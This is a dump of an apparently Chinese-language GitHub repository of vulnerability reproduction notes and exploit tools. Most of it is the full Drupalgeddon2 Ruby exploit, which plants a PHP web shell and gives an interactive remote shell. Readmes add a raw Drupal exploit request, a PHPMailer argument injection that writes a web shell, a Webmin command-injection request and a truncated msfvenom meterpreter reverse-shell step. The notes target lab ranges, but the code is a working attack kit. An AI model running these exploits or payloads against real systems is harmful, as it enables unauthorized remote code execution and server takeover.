├── 2020_09_09_Drupal远程代码执行漏洞(CVE-2018-7600) ├── 0.png ├── drupalggedon2.rb └── readme.md ├── 2020_09_09_Jupyter Notebook未授权访问漏洞复现 ├── 0.png ├── 1.png └── readme.md ├── 2020_09_09_PHPMailer远程命令执行漏洞复现(CVE-2016-10033) ├── 0.png └── readme.md ├── 2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107) ├── 0.png ├── 1.png └── readme.md ├── 2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337) ├── 0.png ├── cve-2020-1337-poc-master.zip └── readme.md ├── 2020_10_09_Apache Flink任意jar包上传漏洞复现 ├── 0.png ├── 1.png ├── 2.png ├── 3.png ├── 4.png └── readme.md ├── 2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409) ├── 1.png ├── 2.png └── readme.md ├── 2020_10_12_RedHat 5.4权限提升漏洞复现(CVE-2010-3847) ├── b1.png ├── cve-2010-3847.sh └── readme.md ├── 2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615) ├── f0.png ├── f1.png └── readme.md ├── 2020_10_15_(未复现)VMware vCenter未验证的任意文件读取漏洞 └── readme.md ├── 2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540) ├── 0.png ├── 1.png ├── 2.png └── readme.md ├── 2020_10_26_如何绕过“请在微信客户端打开链接”的限制 ├── 0.png ├── 1.png ├── 2.png ├── 3.png ├── 4.png └── readme.md ├── 2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935) ├── WebSocketClient.js ├── WebSocketServlet.java ├── a.png ├── a0.png ├── a1.png ├── a2.png ├── a3.png ├── b.png ├── c.png ├── d.png ├── e.png ├── f.png ├── readme.md └── tcdos ├── 2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781) ├── 0.png ├── CVE-2019-19781.zip └── readme.md ├── 2020_11_11_Discuz 7.x 6.x 全局变量防御绕过导致远程代码执行 ├── 0.png └── readme.md ├── 2020_11_11_Supervisord远程代码执行漏洞复现(CVE-2017-11610) ├── 0.png ├── poc.py └── readme.md ├── 2020_11_11_ThinkCMF远程代码执行漏洞复现 ├── 0.png ├── 1.png ├── ThinkCMFX_2.2.3.zip └── readme.md ├── 2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796) ├── 0.png ├── cve-2020-0796-local提权工具.exe └── readme.md ├── 2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388) ├── 0.png ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── hhupd.exe └── readme.md ├── 2020_11_11_phpstudy后门漏洞复现 ├── 0.png ├── 1.png └── readme.md ├── 2020_11_11_“git泄漏”漏洞复现 ├── 0.png ├── 1.png ├── GitHack-master.zip └── readme.md ├── 2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735) ├── a0.png ├── a1.png ├── a2.png ├── a3.png ├── a4.png └── readme.md ├── 2020_11_13_Microsoft SQL Server Reporting Services权限提升漏洞复现(CVE-2020-0618) └── readme.md ├── 2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841) ├── 0.png ├── 1.png └── readme.md ├── 2020_11_13_iis6.0(cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因 └── readme.md ├── 2020_11_15_Windows RDP服务远程代码执行漏洞复现(CVE-2019-0708)-BlueKeep ├── cve_2019_0708_bluekeep.rb ├── cve_2019_0708_bluekeep_rce.rb ├── rdp.rb ├── rdp_scanner.rb └── readme.md ├── 2020_11_18_Citrix XenMobile目录遍历漏洞复现(CVE-2020-8209) ├── 0.png ├── 1.png └── readme.md ├── 2020_12_10_(未成功)Microsoft Exchange Server 2010远程代码执行漏洞复现(CVE-2020-17144) ├── 0.png ├── CVE-2020-17144.exe └── readme.md ├── 2020_12_17_S2-061远程代码执行漏洞复现(CVE-2020-17530) ├── 0.png ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── readme.md ├── s2-061-batch-detect-exp.py └── s2-061-batch-detect.py ├── 2021_01_10_通达OA未授权访问+文件上传导致RCE ├── 0.png └── readme.md ├── 2021_01_11_ThinkPHP远程命令执行漏洞复现 ├── 0.png ├── readme.md └── thinkphp版本总结.txt ├── 2021_01_18_JumpServer远程代码执行漏洞 ├── 0.png ├── a0.png ├── a1.png ├── jumpserver-rce.py ├── quick_start.sh └── readme.md ├── 2021_01_27_SonicWall SSL-VPN远程命令执行漏洞复现 ├── 0.png ├── 1.png ├── batch-detect.py ├── readme.md └── urls.txt ├── 2021_02_06_Linux sudo权限提升漏洞复现(CVE-2021-3156) ├── CVE-2021-3156.zip ├── a0.png ├── a1.png ├── b0.png ├── b1.png ├── c0.png └── readme.md ├── 2021_02_24_WebLogic远程命令执行漏洞复现(CVE-2021-2109) ├── 0.png └── readme.md ├── 2021_02_28_VMware vCenter Server未授权文件上传导致RCE漏洞复现 ├── pic │ ├── 0.png │ └── readme.md └── readme.md └── README.md /2020_09_09_Drupal远程代码执行漏洞(CVE-2018-7600)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Drupal远程代码执行漏洞(CVE-2018-7600)/0.png -------------------------------------------------------------------------------- /2020_09_09_Drupal远程代码执行漏洞(CVE-2018-7600)/drupalggedon2.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # 3 | # [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/ 4 | # 5 | # Authors: 6 | # - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked 7 | # - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k 8 | # 9 | 10 | 11 | require 'base64' 12 | require 'json' 13 | require 'net/http' 14 | require 'openssl' 15 | require 'readline' 16 | require 'highline/import' 17 | 18 | 19 | # Settings - Try to write a PHP to the web root? 20 | try_phpshell = true 21 | # Settings - General/Stealth 22 | $useragent = "drupalgeddon2" 23 | webshell = "shell.php" 24 | # Settings - Proxy information (nil to disable) 25 | $proxy_addr = nil 26 | $proxy_port = 8080 27 | 28 | 29 | # Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!) 30 | bashcmd = "&1' ); }" 31 | bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d" 32 | 33 | 34 | # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 35 | 36 | 37 | # Function http_request [type] [data] 38 | def http_request(url, type="get", payload="", cookie="") 39 | puts verbose("HTTP - URL : #{url}") if $verbose 40 | puts verbose("HTTP - Type: #{type}") if $verbose 41 | puts verbose("HTTP - Data: #{payload}") if not payload.empty? and $verbose 42 | 43 | begin 44 | uri = URI(url) 45 | request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri) 46 | request.initialize_http_header({"User-Agent" => $useragent}) 47 | request.initialize_http_header("Cookie" => cookie) if not cookie.empty? 48 | request.body = payload if not payload.empty? 49 | return $http.request(request) 50 | rescue SocketError 51 | puts error("Network connectivity issue") 52 | rescue Errno::ECONNREFUSED => e 53 | puts error("The target is down ~ #{e.message}") 54 | puts error("Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...") if $proxy_addr 55 | rescue Timeout::Error => e 56 | puts error("The target timed out ~ #{e.message}") 57 | end 58 | 59 | # If we got here, something went wrong. 60 | exit 61 | end 62 | 63 | 64 | # Function gen_evil_url [method] [shell] [phpfunction] 65 | def gen_evil_url(evil, element="", shell=false, phpfunction="passthru") 66 | puts info("Payload: #{evil}") if not shell 67 | puts verbose("Element : #{element}") if not shell and not element.empty? and $verbose 68 | puts verbose("PHP fn : #{phpfunction}") if not shell and $verbose 69 | 70 | # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render 71 | # Check the version to match the payload 72 | if $drupalverion.start_with?("8") and element == "mail" 73 | # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200 74 | url = $target + $clean_url + $form + "?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" 75 | payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpfunction + "&mail[a][#type]=markup&mail[a][#markup]=" + evil 76 | 77 | elsif $drupalverion.start_with?("8") and element == "timezone" 78 | # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru 79 | url = $target + $clean_url + $form + "?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax" 80 | payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=" + phpfunction + "&timezone[a][#lazy_builder][][]=" + evil 81 | 82 | #puts warning("WARNING: May benefit to use a PHP web shell") if not try_phpshell and phpfunction != "passthru" 83 | 84 | elsif $drupalverion.start_with?("7") and element == "name" 85 | # Method #3 - Drupal v7.x: name, #post_render - HTTP 200 86 | url = $target + "#{$clean_url}#{$form}&name[%23post_render][]=" + phpfunction + "&name[%23type]=markup&name[%23markup]=" + evil 87 | payload = "form_id=user_pass&_triggering_element_name=name" 88 | end 89 | 90 | # Drupal v7.x needs an extra value from a form 91 | if $drupalverion.start_with?("7") 92 | response = http_request(url, "post", payload, $session_cookie) 93 | 94 | form_name = "form_build_id" 95 | puts verbose("Form name : #{form_name}") if $verbose 96 | 97 | form_value = response.body.match(/input type="hidden" name="#{form_name}" value="(.*)"/).to_s.slice(/value="(.*)"/, 1).to_s.strip 98 | puts warning("WARNING: Didn't detect #{form_name}") if form_value.empty? 99 | puts verbose("Form value : #{form_value}") if $verbose 100 | 101 | url = $target + "#{$clean_url}file/ajax/name/%23value/" + form_value 102 | payload = "#{form_name}=#{form_value}" 103 | end 104 | 105 | return url, payload 106 | end 107 | 108 | 109 | # Function clean_result 110 | def clean_result(input) 111 | #result = JSON.pretty_generate(JSON[response.body]) 112 | #result = $drupalverion.start_with?("8")? JSON.parse(clean)[0]["data"] : clean 113 | clean = input.to_s.strip 114 | 115 | # PHP function: passthru 116 | # For: [{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}] 117 | clean.slice!(/\[{"command":".*}\]$/) 118 | 119 | # PHP function: exec 120 | # For: [{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}] 121 | #clean.slice!(/\[{"command":".*data":"/) 122 | #clean.slice!(/\\u003Cspan class=\\u0022.*}\]$/) 123 | 124 | # Newer PHP for an older Drupal 125 | # For: Deprecated: assert(): Calling assert() with a string argument is deprecated in /var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php on line 151
126 | #clean.slice!(/.*
/) 127 | 128 | # Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500 129 | # For: Deprecated: assert(): Calling assert() with a string argument is deprecated in /var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php on line 151
130 | clean.slice!(/The website encountered an unexpected error.*/) 131 | 132 | return clean 133 | end 134 | 135 | 136 | # Feedback when something goes right 137 | def success(text) 138 | # Green 139 | return "\e[#{32}m[+]\e[0m #{text}" 140 | end 141 | 142 | # Feedback when something goes wrong 143 | def error(text) 144 | # Red 145 | return "\e[#{31}m[-]\e[0m #{text}" 146 | end 147 | 148 | # Feedback when something may have issues 149 | def warning(text) 150 | # Yellow 151 | return "\e[#{33}m[!]\e[0m #{text}" 152 | end 153 | 154 | # Feedback when something doing something 155 | def action(text) 156 | # Blue 157 | return "\e[#{34}m[*]\e[0m #{text}" 158 | end 159 | 160 | # Feedback with helpful information 161 | def info(text) 162 | # Light blue 163 | return "\e[#{94}m[i]\e[0m #{text}" 164 | end 165 | 166 | # Feedback for the overkill 167 | def verbose(text) 168 | # Dark grey 169 | return "\e[#{90}m[v]\e[0m #{text}" 170 | end 171 | 172 | 173 | # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 174 | 175 | def init_authentication() 176 | $uname = ask('Enter your username: ') { |q| q.echo = false } 177 | $passwd = ask('Enter your password: ') { |q| q.echo = false } 178 | $uname_field = ask('Enter the name of the username form field: ') { |q| q.echo = true } 179 | $passwd_field = ask('Enter the name of the password form field: ') { |q| q.echo = true } 180 | $login_path = ask('Enter your login path (e.g., user/login): ') { |q| q.echo = true } 181 | $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...): ') { |q| q.echo = true } 182 | end 183 | 184 | def is_arg(args, param) 185 | args.each do |arg| 186 | if arg == param 187 | return true 188 | end 189 | end 190 | return false 191 | end 192 | 193 | 194 | # Quick how to use 195 | def usage() 196 | puts 'Usage: ruby drupalggedon2.rb [--authentication] [--verbose]' 197 | puts 'Example for target that does not require authentication:' 198 | puts ' ruby drupalgeddon2.rb https://example.com' 199 | puts 'Example for target that does require authentication:' 200 | puts ' ruby drupalgeddon2.rb https://example.com --authentication' 201 | end 202 | 203 | 204 | # Read in values 205 | if ARGV.empty? 206 | usage() 207 | exit 208 | end 209 | 210 | $target = ARGV[0] 211 | init_authentication() if is_arg(ARGV, '--authentication') 212 | $verbose = is_arg(ARGV, '--verbose') 213 | 214 | 215 | # Check input for protocol 216 | $target = "http://#{$target}" if not $target.start_with?("http") 217 | # Check input for the end 218 | $target += "/" if not $target.end_with?("/") 219 | 220 | 221 | # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 222 | 223 | 224 | # Banner 225 | puts action("--==[::#Drupalggedon2::]==--") 226 | puts "-"*80 227 | puts info("Target : #{$target}") 228 | puts info("Proxy : #{$proxy_addr}:#{$proxy_port}") if $proxy_addr 229 | puts info("Write? : Skipping writing PHP web shell") if not try_phpshell 230 | puts "-"*80 231 | 232 | 233 | # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 234 | 235 | 236 | # Setup connection 237 | uri = URI($target) 238 | $http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port) 239 | 240 | # Use SSL/TLS if needed 241 | if uri.scheme == "https" 242 | $http.use_ssl = true 243 | $http.verify_mode = OpenSSL::SSL::VERIFY_NONE 244 | end 245 | 246 | $session_cookie = '' 247 | # If authentication required then login and get session cookie 248 | if $uname 249 | $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix 250 | response = http_request($target + $login_path, 'post', $payload, $session_cookie) 251 | if (response.code == '200' or response.code == '303') and not response.body.empty? and response['set-cookie'] 252 | $session_cookie = response['set-cookie'].split('; ')[0] 253 | puts success("Logged in - Session Cookie : #{$session_cookie}") 254 | end 255 | 256 | end 257 | 258 | # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 259 | 260 | 261 | # Try and get version 262 | $drupalverion = "" 263 | 264 | # Possible URLs 265 | url = [ 266 | # --- changelog --- 267 | # Drupal v6.x / v7.x [200] 268 | $target + "CHANGELOG.txt", 269 | # Drupal v8.x [200] 270 | $target + "core/CHANGELOG.txt", 271 | 272 | # --- bootstrap --- 273 | # Drupal v7.x / v6.x [403] 274 | $target + "includes/bootstrap.inc", 275 | # Drupal v8.x [403] 276 | $target + "core/includes/bootstrap.inc", 277 | 278 | # --- database --- 279 | # Drupal v7.x / v6.x [403] 280 | $target + "includes/database.inc", 281 | # Drupal v7.x [403] 282 | #$target + "includes/database/database.inc", 283 | # Drupal v8.x [403] 284 | #$target + "core/includes/database.inc", 285 | 286 | # --- landing page --- 287 | # Drupal v8.x / v7.x [200] 288 | $target, 289 | ] 290 | 291 | # Check all 292 | url.each do|uri| 293 | # Check response 294 | response = http_request(uri, 'get', '', $session_cookie) 295 | 296 | # Check header 297 | if response['X-Generator'] and $drupalverion.empty? 298 | header = response['X-Generator'].slice(/Drupal (.*) \(https:\/\/www.drupal.org\)/, 1).to_s.strip 299 | 300 | if not header.empty? 301 | $drupalverion = "#{header}.x" if $drupalverion.empty? 302 | puts success("Header : v#{header} [X-Generator]") 303 | puts verbose("X-Generator: #{response['X-Generator']}") if $verbose 304 | end 305 | end 306 | 307 | # Check request response, valid 308 | if response.code == "200" 309 | tmp = $verbose ? " [HTTP Size: #{response.size}]" : "" 310 | puts success("Found : #{uri} (HTTP Response: #{response.code})#{tmp}") 311 | 312 | # Check to see if it says: The requested URL "http://" was not found on this server. 313 | puts warning("WARNING: Could be a false-positive [1-1], as the file could be reported to be missing") if response.body.downcase.include? "was not found on this server" 314 | 315 | # Check to see if it says:

Page not found

The requested page could not be found.
316 | puts warning("WARNING: Could be a false-positive [1-2], as the file could be reported to be missing") if response.body.downcase.include? "the requested page could not be found" 317 | 318 | # Only works for CHANGELOG.txt 319 | if uri.match(/CHANGELOG.txt/) 320 | # Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x 321 | puts warning("WARNING: Unable to detect keyword 'drupal.org'") if not response.body.downcase.include? "drupal.org" 322 | 323 | # Patched already? (For Drupal v8.4.x / v7.x) 324 | puts warning("WARNING: Might be patched! Found SA-CORE-2018-002: #{url}") if response.body.include? "SA-CORE-2018-002" 325 | 326 | # Try and get version from the file contents (For Drupal v8.4.x / v7.x) 327 | $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip 328 | 329 | # Blank if not valid 330 | $drupalverion = "" if not $drupalverion[-1] =~ /\d/ 331 | end 332 | 333 | # Check meta tag 334 | if not response.body.empty? 335 | # For Drupal v8.x / v7.x 336 | meta = response.body.match(/> ", true).to_s 642 | 643 | # Check input 644 | puts warning("WARNING: Detected an known bad character (>)") if command =~ />/ 645 | 646 | # Exit 647 | break if command == "exit" 648 | 649 | # Blank link? 650 | next if command.empty? 651 | 652 | # If PHP web shell 653 | if not webshellpath.empty? 654 | # Send request 655 | result = http_request("#{$target}#{webshellpath}", "post", "c=#{command}", $session_cookie).body 656 | # Direct OS commands 657 | else 658 | url, payload = gen_evil_url(command, $element, true) 659 | response = http_request(url, "post", payload, $session_cookie) 660 | 661 | # Check result 662 | if not response.body.empty? 663 | result = clean_result(response.body) 664 | end 665 | end 666 | 667 | # Feedback 668 | puts result 669 | end 670 | -------------------------------------------------------------------------------- /2020_09_09_Drupal远程代码执行漏洞(CVE-2018-7600)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 3 | 4 | # 0x01 利用条件 5 | 无 6 | 7 | # 0x02 影响版本 8 | 7.23<=7.x<=7.57 9 | 8.3.x<=8.3.8 10 | 8.4.x<=8.4.5 11 | 8.5.x<=8.5.0 12 | 13 | # 0x03 漏洞复现 14 | 执行“ruby ./drupalggedon2.rb http://172.16.35.128:8080” 15 | 会返回一个shell,可在返回的shell中执行命令,如下图 16 | ![image](./0.png) 17 | 18 | # 0x04 踩坑记录 19 | 坑1: 20 | 环境创建完之后,使用kali下的firefox访问127.0.0.1:8080时,burp不能抓到数据包,原因未知,解决方案:使用kali下的firefox访问局域网ip“172.16.35.128:8080” 21 | 坑2: 22 | 登录状态下使用vulhub中的poc无效,需要登出后才可执行命令id,vulhub中的poc如下: 23 | ``` 24 | POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 25 | Host: your-ip:8080 26 | Accept-Encoding: gzip, deflate 27 | Accept: */* 28 | Accept-Language: en 29 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 30 | Connection: close 31 | Content-Type: application/x-www-form-urlencoded 32 | Content-Length: 103 33 | 34 | form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id 35 | ``` 36 | 坑3: 37 | 使用vulhub中的poc执行命令“ls”,只能看到一个文件“web.config”,执行命令“ls -a /”也只能看到一个文件“var” 38 | 39 | # 参考链接 40 | https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 41 | -------------------------------------------------------------------------------- /2020_09_09_Jupyter Notebook未授权访问漏洞复现/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Jupyter Notebook未授权访问漏洞复现/0.png -------------------------------------------------------------------------------- /2020_09_09_Jupyter Notebook未授权访问漏洞复现/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Jupyter Notebook未授权访问漏洞复现/1.png -------------------------------------------------------------------------------- /2020_09_09_Jupyter Notebook未授权访问漏洞复现/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:360众测仿真实战靶场考试 3 | 其他复现环境:https://github.com/vulhub/vulhub/tree/master/jupyter/notebook-rce 4 | 5 | # 0x01 利用条件 6 | 无 7 | 8 | # 0x02 影响版本 9 | 全版本(只要管理员没有为web界面访问配置密码、ip限制等策略,都受影响) 10 | 11 | # 0x03 漏洞复现 12 | 由于考试时没有截图,故下图借用别人的图 13 | 14 | 新建一个terminal窗口,如图 15 | ![image](./0.png) 16 | 直接就RCE了,如图 17 | ![image](./1.png) 18 | 19 | # 0x04 踩坑记录 20 | 无 21 | 22 | # 参考链接 23 | https://www.cnblogs.com/mke2fs/p/12718499.html 24 | -------------------------------------------------------------------------------- /2020_09_09_PHPMailer远程命令执行漏洞复现(CVE-2016-10033)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_PHPMailer远程命令执行漏洞复现(CVE-2016-10033)/0.png -------------------------------------------------------------------------------- /2020_09_09_PHPMailer远程命令执行漏洞复现(CVE-2016-10033)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://www.mozhe.cn/bug/detail/124 3 | 4 | # 0x01 利用条件 5 | 无 6 | 7 | # 0x02 影响版本 8 | PHPMailer<5.2.18 9 | 10 | # 0x03 漏洞复现 11 | 启动墨者学院的靶场环境,看到一个网站,点击底部的“Mail Contact”,进入“http://219.153.49.228:49754/mail.php” 12 | 在name处随便输入比如“aaa”,在email处输入: 13 | ``` 14 | "aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com 15 | ``` 16 | 在message处输入一句话木马: 17 | ``` 18 | 19 | ``` 20 | 蚁剑链接http://219.153.49.228:49754/a.php ,成功拿到webshell,如下图 21 | ![image](./0.png) 22 | 23 | # 0x04 踩坑记录 24 | 坑1:上传完一句话木马后,页面会响应3-5分钟,响应时间较长 25 | 26 | # 参考链接 27 | https://www.jianshu.com/p/745c82d8b6e0 28 | -------------------------------------------------------------------------------- /2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107)/0.png -------------------------------------------------------------------------------- /2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107)/1.png -------------------------------------------------------------------------------- /2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://www.mozhe.cn/bug/detail/d01lL2RSbGEwZUNTeThVZ0xDdXl0Zz09bW96aGUmozhe 3 | 复现版本:Webmin1.910 4 | 5 | # 0x01 利用条件 6 | 需要开启密码重置功能,如下图 7 | ![image](./0.png) 8 | 查看webmin的配置文件/etc/webmin/miniserv.conf,可以发现passwd_mode的值已经从0变为了2 9 | 10 | # 0x02 影响版本 11 | Webmin<=1.920 12 | 13 | # 0x03 漏洞复现 14 | 随便发起一个请求,burp拦截,修改为如下数据包 15 | ``` 16 | POST /password_change.cgi HTTP/1.1 17 | Host: 219.153.49.228:41489 18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01 19 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 20 | Accept-Encoding: gzip, deflate 21 | Referer: http://219.153.49.228:41489/passwd/index.cgi?xnavigation=1 22 | X-PJAX: true 23 | X-PJAX-Container: [data-dcontainer] 24 | X-PJAX-URL: passwd/edit_passwd.cgi?user=root 25 | X-Requested-From: passwd 26 | X-Requested-From-Tab: webmin 27 | X-Requested-With: XMLHttpRequest 28 | Content-Type: text/plain;charset=UTF-8 29 | Content-Length: 60 30 | Connection: close 31 | 32 | user=yibudengtian&old=cat /key.txt&new1=123456&new2=123456 33 | ``` 34 | 35 | # 0x04 踩坑记录 36 | 坑1: 37 | ![image](./1.png) 38 | 39 | # 参考链接 40 | https://xz.aliyun.com/t/6040 41 | https://www.cnblogs.com/paperpen/p/11442532.html 42 | -------------------------------------------------------------------------------- /2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337)/0.png -------------------------------------------------------------------------------- /2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337)/cve-2020-1337-poc-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337)/cve-2020-1337-poc-master.zip -------------------------------------------------------------------------------- /2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:win10 1909 18363.657 3 | 4 | # 0x01 利用条件 5 | 无 6 | 7 | # 0x02 影响版本 8 | win7、win8.1、win10 9 | 2008、2008 r2、2012、2012 r2、2016、2019 10 | 详细参见:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1337#ID0EGB 11 | 12 | # 0x03 漏洞复现 13 | 打开一个powershell控制台,查看执行策略“get-executionPolicy”,修改执行策略为最宽松的“set-executionPolicy unrestricted”,先执行.\poc.ps1,再执行.\WerTrigger.exe 14 | ![image](./0.png) 15 | 16 | # 0x04 踩坑记录 17 | 无 18 | 19 | # 参考链接 20 | https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/ 21 | https://github.com/sailay1996/cve-2020-1337-poc 22 | -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Flink任意jar包上传漏洞复现/0.png -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Flink任意jar包上传漏洞复现/1.png -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Flink任意jar包上传漏洞复现/2.png -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Flink任意jar包上传漏洞复现/3.png -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Flink任意jar包上传漏洞复现/4.png -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:本地搭建的环境 3 | 复现版本:Flink 1.9.1 4 | 5 | # 0x01 环境搭建 6 | 目标环境:centos7_x64_en-us + flink-1.9.1-bin-scala_2.11.tgz + openjdk version "1.8.0_181" 7 | 8 | wget https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz 9 | tar -xvf ./flink-1.9.1-bin-scala_2.11.tgz 10 | cd ./flink-1.9.1/bin/ 11 | ./start-cluster.sh 12 | 查看端口8081是否开启,如下图 13 | ![image](./0.png) 14 | 浏览器访问,出现下图所示,表示成功启动 15 | ![image](./1.png) 16 | 17 | # 0x02 利用条件 18 | 无 19 | 20 | # 0x03 影响版本 21 | Flink <= 1.9.1 22 | 23 | # 0x04 漏洞复现 24 | 攻击环境:kali2020 + msf5 25 | 26 | msfvenom -p java/meterpreter/reverse_tcp lhost=172.16.35.128 lport=9999 -o text.jar 27 | msfconsole 28 | use 